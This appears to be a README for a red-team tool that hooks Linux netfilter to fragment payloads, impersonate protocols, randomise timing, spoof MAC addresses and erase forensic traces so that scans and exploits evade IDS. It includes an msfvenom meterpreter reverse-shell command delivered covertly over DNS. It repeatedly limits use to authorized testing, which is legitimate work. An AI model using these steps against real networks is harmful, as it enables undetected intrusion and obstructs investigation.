Flea Flicker NetFilter

Network Evasion for Red Teams

IDS blocks your scans. ML detects your payloads. Behavioral analysis flags your timing.

Your pentest is over before it starts.

Flea Flicker manipulates packets at kernel level. Before they hit the network. Before IDS sees them.

Netfilter hooks. Fragment payloads. Randomize timing. Impersonate protocols. Traffic looks legitimate. IDS sees nothing suspicious.

Manual control over packet behavior. Not automated evasion. Not script kiddie tools.

What It Does

Deep Packet Inspection Evasion

IDS reads packet contents. Pattern matching catches exploits. Signature detection blocks payloads.

Flea Flicker fragments your attack across multiple packets:

• Fragment payloads across multiple packets
• Encrypt at application layer before network layer
• Insert random padding between fragments
• Reassemble only at destination

Example:

Normal Metasploit payload:
[TCP Header][Exploit Code]
↓ IDS sees exploit signature, blocks

Flea Flicker:
[TCP Header][Fragment 1 + Padding]
[TCP Header][Fragment 2 + Padding]
[TCP Header][Fragment 3 + Padding]
↓ IDS sees incomplete fragments, allows
↓ Target reassembles into exploit

Protocol Impersonation

Unusual protocols get flagged. Port scans detected immediately.

Make attack traffic look like legitimate services:

Example:

Nmap scan on port 445:
→ SMB enumeration detected, blocked

Flea Flicker wrapped Nmap:
→ Packets look like HTTPS traffic on 443
→ Payload hidden in TLS-like structure
→ IDS sees "normal web browsing"
→ Scan proceeds undetected

Timing Randomization

Behavioral analysis detects patterns. Regular intervals = automated scanning. You get caught.

Randomize everything:

• Random delays between packets (0.1s - 5s)
• Jitter injection (mimics human interaction)
• Volume throttling (stays under threshold)

What it defeats:

• Time-series analysis (looks for patterns)
• Rate limiting (stays under trigger threshold)
• Correlation engines (breaks temporal clustering)

MAC Address Rotation

Network access control. MAC filtering. Device tracking. They know your hardware.

Rotate and spoof:

• Rotate MAC every N packets
• Spoof vendor OUI (looks like different hardware)
• Maintain DHCP lease across rotations

Use case: Bypass MAC filtering on WiFi networks during pentest.

Traffic Mimicry

Volume analysis spots anomalies. Attack traffic doesn't look like normal users. You stand out.

Hide in normal traffic:

• Generate decoy traffic (legitimate-looking)
• Match volume patterns (office hours, usage spikes)
• Protocol diversity (HTTP, DNS, SMTP mixed)

Result: Real attack hidden in noise that looks like normal user.

Technical Implementation

Netfilter hooks (Linux kernel):

// Intercept outbound packets
nf_register_hook(&nfho_out, PF_INET, NF_INET_POST_ROUTING,
                 packet_handler, NF_IP_PRI_FIRST);

// Modify before sending
unsigned int packet_handler(void *priv, struct sk_buff *skb, ...) {
    // Fragment payload
    // Add encryption layer
    // Inject timing delays
    // Spoof headers
    return NF_ACCEPT; // Send modified packet
}

Architecture:

[Application] → [Payload]
      ↓
[Flea Flicker Interceptor]
      ↓
[Fragment + Encrypt + Obfuscate + Time Delay]
      ↓
[Modified Packets] → [Network]

Real-World Scenario

Objective: Enumerate SMB shares on corporate network with IDS deployed.

Without Flea Flicker:

$ nmap -p 445 --script smb-enum-shares 10.0.0.0/24
→ IDS detects: Port scan + SMB enumeration
→ Alert triggered
→ IP blocked
→ Pentest detected

With Flea Flicker:

$ flea-flicker --mode ghost --protocol https \
  nmap -p 445 --script smb-enum-shares 10.0.0.0/24

→ Packets fragmented across 20-second window
→ Traffic appears as HTTPS on port 443
→ Timing randomized (looks like browsing)
→ IDS sees: Normal web traffic
→ Scan completes undetected
→ Pentest proceeds

Pentest Integration

Metasploit payload wrapping:

# Generate payload
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.0.0.1 LPORT=443 -f raw > payload.bin

# Wrap with Flea Flicker
flea-flicker --wrap payload.bin \
  --protocol dns --fragment-size 64 --delay 0.5-3.0

# Deliver wrapped payload
# Target receives fragments over DNS
# IDS sees legitimate DNS queries
# Payload reassembles and executes

Burp Suite extension:

[Burp Repeater]
     ↓
[Flea Flicker Proxy]
     ↓
[Obfuscated HTTP requests]
     ↓
[Target Web App]

WAF sees fragmented, time-delayed requests
Attack succeeds where direct request blocked

Nmap evasion:

# Standard aggressive scan (detected immediately)
nmap -A -T4 target.com

# Flea Flicker wrapped (evades detection)
flea-flicker --mode shadow --timing random \
  nmap -A -T2 target.com

Installation

# Clone repository
git clone https://github.com/ghostintheprompt/flea-flicker-netfilter
cd flea-flicker-netfilter

# Install dependencies (requires root for netfilter)
sudo ./install.sh

# Load kernel module
sudo modprobe flea_flicker

# Verify installation
flea-flicker --version

Requirements:

• Linux kernel 4.15+ (netfilter support)
• Root access (kernel module loading)
• Python 3.8+ (control scripts)
• Compatible with: Kali, ParrotOS, Ubuntu, Debian

Basic Usage

Ghost Mode (DPI evasion):

# Wrap any command
flea-flicker --mode ghost [command]

# Example: Evade IDS during Nmap scan
flea-flicker --mode ghost nmap -A target.com

Shadow Mode (MAC rotation + traffic mimicry):

# Enable on interface
flea-flicker --mode shadow --interface wlan0

# Continuous MAC rotation every 100 packets
# Generates decoy traffic automatically

Protocol Impersonation:

# Make traffic look like HTTPS
flea-flicker --protocol https nmap -p 445 target.com

# Make traffic look like DNS
flea-flicker --protocol dns [command]

Custom Configuration:

# Fine-grained control
flea-flicker --fragment-size 64 \
  --delay 0.5-3.0 \
  --protocol https \
  --mac-rotation 100 \
  [command]

Operational Security

Memory-only operation:

• No logs written by default
• Configuration in RAM
• Minimal disk artifacts

Clean shutdown:

# Graceful cleanup
flea-flicker --cleanup

# Emergency kill
flea-flicker --emergency-shutdown

# Self-destruct timer (cleanup after N minutes)
flea-flicker --self-destruct 60 [command]

Anti-forensics:

• Clears command history entries
• Wipes kernel module traces
• Removes temporary files
• Resets network state

When To Use This

Authorized pentests. Client network has real defenses. You need to test evasion capabilities. Written permission in hand.

Red team exercises. Blue team deployed IDS/IPS. They think they're safe. Prove them wrong.

Security research. Testing detection algorithms. Building better defenses. Understanding attacker techniques.

Defense development. Blue team needs to know these attacks exist. Build signatures. Improve detection.

Don't Be Stupid

Unauthorized networks = federal prison. CFAA violation. Real consequences.

No written authorization = don't use this tool. Period.

Critical infrastructure, employer networks, school networks without explicit permission = extra illegal.

This is for red teams testing defenses. Not for criminals.

You need: Written authorization. Defined scope. Professional pentest engagement or research environment.

Don't be the person who learns CFAA definitions in federal court.

Why This Exists

Built this after pentest where client deployed ML-based IDS. Standard Nmap = instant detection. Metasploit payloads = blocked immediately. Needed packet manipulation before IDS could analyze anything.

Netfilter hooks at kernel level. Intercept outbound traffic. Fragment payloads. Randomize timing. Impersonate protocols. IDS sees fragmented, delayed traffic that looks legitimate.

Works against: Commercial IDS/IPS, behavioral analysis, signature detection, timing correlation.

Doesn't work against: Deep SSL inspection with client certs, nation-state detection (they analyze everything), air-gapped networks (obviously).

The technique: Understand how each detection method works. Evade systematically. DPI reads content = fragment it. Timing analysis looks for patterns = randomize them. Protocol detection flags unusual traffic = impersonate legitimate services. Behavioral analysis models normal users = generate decoy traffic that matches.

For Red Teams

This gets past commercial defenses. Test in lab first. Understand the evasion techniques. Don't rely on automation.

Manual control over packet behavior. You decide fragmentation size, timing delays, protocol impersonation. Tool provides capability. You provide intelligence.

For Blue Teams

Learn these techniques. Attackers use them. Update your signatures. Behavioral analysis alone isn't enough. Need multi-layer detection: content + timing + volume + protocol analysis.

If red team can evade your IDS with open-source tools, real attackers already are.

---

Open source. Authorized use only. Federal prison is real.

---

github.com/ghostintheprompt/flea-flicker-netfilter

Kernel-level packet manipulation. IDS evasion. Red team toolkit.

Authorized pentests only. Written permission required. Don't be stupid.